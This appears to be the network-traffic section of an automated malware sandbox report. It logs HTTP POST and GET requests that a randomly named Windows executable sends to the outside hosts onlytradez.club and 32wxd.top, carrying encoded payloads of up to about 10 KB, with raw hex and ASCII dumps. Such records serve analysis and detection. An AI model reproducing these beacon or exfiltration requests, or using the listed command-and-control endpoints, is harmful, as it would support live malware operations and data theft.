                  Data Ascii: et--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp
                  Sep 4, 2024 09:36:24.163431883 CEST1236INData Raw: 72 67 62 28 32 35 35 2c 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69
                  Data Ascii: rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,r
                  Sep 4, 2024 09:36:24.168266058 CEST1236INData Raw: 2d 73 69 7a 65 2d 2d 65 78 74 72 61 2d 6c 61 72 67 65 3a 20 34 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 3a 20 39 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69
                  Data Ascii: -size--extra-large: 40px;--wp--preset--font-size--huge: 96px;--wp--preset--font-size--gigantic: 144px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp-


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.449746167.172.133.32805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:29.306436062 CEST754OUTPOST /zctj/ HTTP/1.1
                  Host: www.onlytradez.club
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.onlytradez.club
                  Referer: http://www.onlytradez.club/zctj/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2b 42 72 76 52 5a 4d 69 6b 4f 73 38 78 66 37 4f 59 76 59 6b 35 69 66 43 32 54 4c 36 70 76 66 4d 55 51 4a 41 77 6f 41 48 5a 34 30 73 51 4f 53 77 4b 31 32 57 71 38 39 41 6e 4d 6e 43 71 70 39 61 75 73 34 78 6f 2b 4e 63 64 39 57 70 62 4a 67 6b 72 4f 44 66 53 52 6c 46 50 6c 47 74 4f 4b 30 44 55 38 41 78 33 62 43 42 32 77 69 61 45 64 6b 38 68 44 56 4b 44 44 72 39 6e 69 47 72 42 68 6a 4a 63 72 74 79 53 67 74 6d 63 70 35 56 71 66 42 6a 62 32 51 32 69 42 4f 69 49 4e 71 77 52 6f 4f 36 57 5a 34 73 70 6d 6d 59 31 48 46 35 71 68 46 37 58 6d 38 4c 67 67 3d 3d
                  Data Ascii: 56gD=gQGQ44pjYQij+BrvRZMikOs8xf7OYvYk5ifC2TL6pvfMUQJAwoAHZ40sQOSwK12Wq89AnMnCqp9aus4xo+Ncd9WpbJgkrODfSRlFPlGtOK0DU8Ax3bCB2wiaEdk8hDVKDDr9niGrBhjJcrtySgtmcp5VqfBjb2Q2iBOiINqwRoO6WZ4spmmY1HF5qhF7Xm8Lgg==
                  Sep 4, 2024 09:36:29.774034023 CEST369INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.1
                  Date: Wed, 04 Sep 2024 07:36:29 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Content-Encoding: gzip
                  Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.449747167.172.133.32805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:31.870062113 CEST774OUTPOST /zctj/ HTTP/1.1
                  Host: www.onlytradez.club
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.onlytradez.club
                  Referer: http://www.onlytradez.club/zctj/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 37 4d 4e 79 42 41 33 5a 41 48 51 6f 30 73 62 75 53 31 4f 31 32 4a 71 38 67 39 6e 4a 66 43 71 70 70 61 75 75 67 78 70 50 4e 64 63 74 57 72 55 70 67 36 6d 75 44 66 53 52 6c 46 50 6c 44 77 4f 4b 4d 44 49 63 51 78 33 2f 57 43 38 51 69 5a 46 64 6b 38 77 7a 56 57 44 44 72 44 6e 6a 62 4f 42 6e 2f 4a 63 76 6c 79 53 78 74 35 4c 5a 35 54 33 76 42 32 65 55 6c 6c 73 67 4c 50 4f 74 75 70 4d 6f 53 63 65 2f 70 32 34 58 48 50 6e 48 68 4b 33 6d 4d 50 61 6c 42 43 37 67 66 44 6c 42 4f 4b 42 6a 44 53 53 50 4c 76 37 77 74 36 69 63 77 3d
                  Data Ascii: 56gD=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pc7MNyBA3ZAHQo0sbuS1O12Jq8g9nJfCqppauugxpPNdctWrUpg6muDfSRlFPlDwOKMDIcQx3/WC8QiZFdk8wzVWDDrDnjbOBn/JcvlySxt5LZ5T3vB2eUllsgLPOtupMoSce/p24XHPnHhK3mMPalBC7gfDlBOKBjDSSPLv7wt6icw=
                  Sep 4, 2024 09:36:32.322825909 CEST369INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.1
                  Date: Wed, 04 Sep 2024 07:36:32 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Content-Encoding: gzip
                  Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.449748167.172.133.32805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:34.489667892 CEST10856OUTPOST /zctj/ HTTP/1.1
                  Host: www.onlytradez.club
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.onlytradez.club
                  Referer: http://www.onlytradez.club/zctj/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 7a 4d 52 58 4e 41 30 2b 55 48 4b 6f 30 73 59 75 53 30 4f 31 32 41 71 38 34 78 6e 4a 61 31 71 72 52 61 68 72 30 78 68 64 6c 64 53 74 57 72 4d 5a 67 37 72 4f 43 4c 53 51 55 4d 50 6c 54 77 4f 4b 4d 44 49 65 34 78 67 37 43 43 76 41 69 61 45 64 6b 77 68 44 56 71 44 46 43 34 6e 6a 75 37 47 52 50 4a 63 4f 5a 79 51 43 46 35 4a 35 35 52 32 76 41 7a 65 55 34 39 73 6b 72 74 4f 75 79 54 4d 71 4f 63 64 72 41 30 6b 31 50 32 6c 78 78 30 6b 52 51 46 44 47 51 41 38 57 2f 48 31 44 2f 57 65 6a 33 62 50 63 69 33 2b 68 70 47 6a 4c 4c 54 42 6c 73 75 45 7a 78 6e 48 4a 36 72 64 4a 59 71 68 77 67 2f 67 59 50 57 33 35 36 78 6b 78 50 37 33 6e 72 55 67 6f 70 43 7a 33 58 50 35 32 43 4a 75 56 5a 44 4f 75 36 2f 67 56 7a 63 6b 61 55 69 56 51 54 6b 64 45 57 79 57 6e 33 66 47 47 66 7a 61 4a 38 46 55 34 47 6b 5a 66 48 6e 4c 48 6a 57 30 66 73 78 41 49 41 6f 37 49 38 44 32 4a 63 45 51 54 49 72 45 [TRUNCATED]
                  Data Ascii: 56gD=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pczMRXNA0+UHKo0sYuS0O12Aq84xnJa1qrRahr0xhdldStWrMZg7rOCLSQUMPlTwOKMDIe4xg7CCvAiaEdkwhDVqDFC4nju7GRPJcOZyQCF5J55R2vAzeU49skrtOuyTMqOcdrA0k1P2lxx0kRQFDGQA8W/H1D/Wej3bPci3+hpGjLLTBlsuEzxnHJ6rdJYqhwg/gYPW356xkxP73nrUgopCz3XP52CJuVZDOu6/gVzckaUiVQTkdEWyWn3fGGfzaJ8FU4GkZfHnLHjW0fsxAIAo7I8D2JcEQTIrEMGk0YSJQKHzO5dmZAtQtbfpjbm5q0ZK5g5L/bKPqTnRlslKqaVDL9F88KFZjXJC6/FYIrBCVfupDVZ1E7bhIfv3tVIFOZ5OLS6N+Z/gmUJrZpU9XyzpB6gZDRXP5VzJGeCvk2zeZ8gDJ1fWsaGmZWFi5ChbAeWKBQBysa4SIcnnGEfZvqtwGcM1zDLyazyPHfKT0pgRb3/v9l2UfOZKqava84A1QTzgzcGz++jzcpjY/+aaaKdpqYZoXBiEBxGqtHaIcJ4cUYvYxV/cIZPEPKiJACb3m74lMVxsqs7jDypzbGMcZCHh4pgPsxVcYoFui6xDCq1iQSNvdrlOkfjdXlbtoApDvVzOdsyazUQE+/CRmDCA4pKZKQxGhsIt5UgmK2PRJCTV5k8nYK7DK+5INE83MSX0GbUBlSncb4/KHtmLBjhp1VCIKJjEGoTkCvH393+sGhBsLgNHtHRjLfN0gAznFQ1xyhIGnilF5SNvHhxYgHV9hxHFQGHWUSzJEtNallVog1lmmY8+u1FlSGDZzhFGzKUPs77R0vDy7oVWO515n8MNvjZd+jfF8n5iVgh2SRXSE1c+KgvewiLExItw05G341HdaudUmMPzM2eTebyWxYhxqE3wQYiayjC4rpVPGIaahnxugldpqRZJZkvUVwT/kri9aqi/WEP [TRUNCATED]
                  Sep 4, 2024 09:36:34.873713017 CEST369INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.1
                  Date: Wed, 04 Sep 2024 07:36:34 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Content-Encoding: gzip
                  Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.449749167.172.133.32805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:37.038254976 CEST484OUTGET /zctj/?56gD=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.onlytradez.club
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:36:37.479125023 CEST705INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.1
                  Date: Wed, 04 Sep 2024 07:36:37 GMT
                  Content-Type: text/html
                  Content-Length: 555
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.449750206.119.82.116805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:42.714473963 CEST736OUTPOST /kyiu/ HTTP/1.1
                  Host: www.32wxd.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.32wxd.top
                  Referer: http://www.32wxd.top/kyiu/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 2f 32 67 4a 79 76 75 67 42 2f 42 65 43 4a 53 2f 6e 5a 2f 37 62 67 51 31 41 61 48 42 30 55 4e 72 39 69 33 58 71 6b 4e 36 6e 47 32 44 6b 5a 73 4a 42 2b 78 38 37 78 56 30 56 31 39 5a 4b 52 4d 79 4d 78 6b 2b 4a 41 73 4b 70 61 51 6f 33 4a 71 68 74 6e 7a 41 78 38 5a 30 62 4e 5a 30 52 32 48 33 68 65 75 48 32 67 6e 52 73 61 7a 48 4e 31 6b 68 39 76 52 4e 54 31 2b 38 4e 35 6a 73 31 46 5a 4f 55 52 37 2b 38 78 4e 56 68 44 48 4a 59 46 78 45 73 6c 6a 41 51 44 66 4a 6d 62 55 4f 39 61 41 6a 67 46 68 49 6e 4e 71 63 65 63 6d 67 71 73 4d 57 56 35 66 52 41 3d 3d
                  Data Ascii: 56gD=aBuNv8bUDAAzG/2gJyvugB/BeCJS/nZ/7bgQ1AaHB0UNr9i3XqkN6nG2DkZsJB+x87xV0V19ZKRMyMxk+JAsKpaQo3JqhtnzAx8Z0bNZ0R2H3heuH2gnRsazHN1kh9vRNT1+8N5js1FZOUR7+8xNVhDHJYFxEsljAQDfJmbUO9aAjgFhInNqcecmgqsMWV5fRA==
                  Sep 4, 2024 09:36:43.599426031 CEST691INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:43 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.449751206.119.82.116805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:45.264497042 CEST756OUTPOST /kyiu/ HTTP/1.1
                  Host: www.32wxd.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.32wxd.top
                  Referer: http://www.32wxd.top/kyiu/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 38 4e 72 64 79 33 57 76 45 4e 35 6e 47 32 4c 45 5a 70 58 78 2b 41 38 37 38 32 30 55 4a 39 5a 4b 56 4d 79 4f 5a 6b 2f 36 6f 76 4c 35 61 57 30 33 4a 37 6c 74 6e 7a 41 78 38 5a 30 62 59 45 30 52 65 48 32 51 4f 75 56 44 41 6f 53 73 61 77 4e 74 31 6b 6c 39 75 57 4e 54 31 58 38 4d 6b 45 73 77 42 5a 4f 56 68 37 36 35 64 43 66 68 44 4e 58 6f 45 54 44 35 63 30 47 78 32 71 4b 6c 65 32 48 76 6a 69 72 47 55 37 5a 57 73 39 4f 65 34 56 39 74 6c 34 62 57 45 57 4b 49 6e 32 57 32 43 4b 36 33 5a 57 5a 42 32 5a 4e 45 70 6e 34 7a 45 3d
                  Data Ascii: 56gD=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBC8Nrdy3WvEN5nG2LEZpXx+A87820UJ9ZKVMyOZk/6ovL5aW03J7ltnzAx8Z0bYE0ReH2QOuVDAoSsawNt1kl9uWNT1X8MkEswBZOVh765dCfhDNXoETD5c0Gx2qKle2HvjirGU7ZWs9Oe4V9tl4bWEWKIn2W2CK63ZWZB2ZNEpn4zE=
                  Sep 4, 2024 09:36:46.189671040 CEST691INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:46 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.449752206.119.82.116805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:47.808141947 CEST10838OUTPOST /kyiu/ HTTP/1.1
                  Host: www.32wxd.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.32wxd.top
                  Referer: http://www.32wxd.top/kyiu/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 45 4e 72 4f 71 33 58 4f 45 4e 34 6e 47 32 49 45 5a 6f 58 78 2b 5a 38 37 6b 71 30 55 46 4c 5a 4a 39 4d 77 74 68 6b 34 4c 6f 76 46 35 61 57 2f 58 4a 72 68 74 6e 69 41 78 73 6a 30 62 49 45 30 52 65 48 32 53 6d 75 43 47 67 6f 55 73 61 7a 48 4e 31 67 68 39 76 78 4e 53 64 74 38 4d 67 2b 76 45 31 5a 4f 31 78 37 38 66 4a 43 5a 78 44 44 57 6f 45 31 44 35 5a 7a 47 78 72 56 4b 6d 44 62 48 73 2f 69 75 54 56 34 44 53 78 6a 66 4e 4d 66 71 38 55 65 55 55 38 42 4c 70 2b 4c 54 44 69 47 73 58 64 44 65 6a 58 56 57 77 56 50 71 31 49 6f 52 4e 64 4c 64 70 67 5a 6c 78 6f 68 2f 62 6f 39 6f 45 68 37 69 6c 34 78 53 63 34 56 42 79 43 